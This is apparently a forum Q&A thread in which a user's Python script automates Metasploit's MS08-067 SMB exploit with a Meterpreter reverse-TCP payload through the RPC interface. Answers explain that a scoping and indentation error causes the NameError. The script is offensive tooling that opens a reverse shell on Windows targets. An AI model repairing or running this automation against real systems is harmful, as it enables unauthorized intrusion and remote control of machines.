0

I'm using the following code to automate Metasploit:

import os, msfrpc, optparse, sys, subprocess
from time import sleep

def sploiter(RHOST, LHOST, LPORT, session):
 client = msfrpc.Msfrpc({})
 client.login('msf', '123')
 ress = client.call('console.create')
 console_id = ress['id']

 RHOST="192.168.1.102"
 LPORT="444"
 LHOST="127.0.0.1"

commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """+RHOST+"""
set LHOST """+LHOST+"""
set LPORT """+LPORT+"""
set ExitOnSession false
exploit -z
"""
print "[+] Exploiting MS08-067 on: "+RHOST
client.call('console.write',[console_id,commands])
res = client.call('console.read',[console_id])
result = res['data'].split('\n')

But it's not working and I'm getting the error:

client.call('console.write',[console_id,commands]) NameError: name 'client' is not defined

What is the problem? Is there any other script that could work in a similar way?

knobiDev
  • 462
  • 1
  • 5
  • 17
  • This is looking like a python programming question and not a security or even a metasploit problem. The error message is purely an internal python logic flow error. – schroeder Feb 10 '16 at 16:31

2 Answers2

3

Your indentation is off. So clients.call() is performed outside the context where you create it inside the sploiter function.

Lucas Kauffman
  • 6,789
  • 15
  • 60
  • 86
1

Your client only exists inside your sploiter method. Im not that familiar with python but I think you could adjust the sploiter method so that it returns the client.

client = msfrpc.Msfrpc({})
client.login('msf', '123')
return client

In the part below you could do something like

client = sploiter(Parameter1, Parameter2, Parameter3, Parameter4)
client.call('console.write',[console_id,commands])
Lexu
  • 579
  • 1
  • 5
  • 14